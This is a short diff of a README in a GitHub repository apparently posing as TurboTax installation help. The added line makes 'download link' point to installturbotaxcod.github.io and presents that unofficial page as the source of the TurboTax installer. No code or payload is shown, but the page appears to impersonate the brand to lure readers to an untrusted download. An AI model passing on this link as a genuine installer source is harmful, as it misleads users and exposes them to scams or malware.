installturbotaxcod/installturbotaxcod.github.io/README.md

 ###Download TurboTax:

 If you purchased online, you'll receive a download link in your email or on the purchase confirmation page.
-Click the download link to start downloading the TurboTax installer.
+Click the <a href="https://installturbotaxcod.github.io/">download link</a> to start downloading the TurboTax installer.

 ###Run the Installer: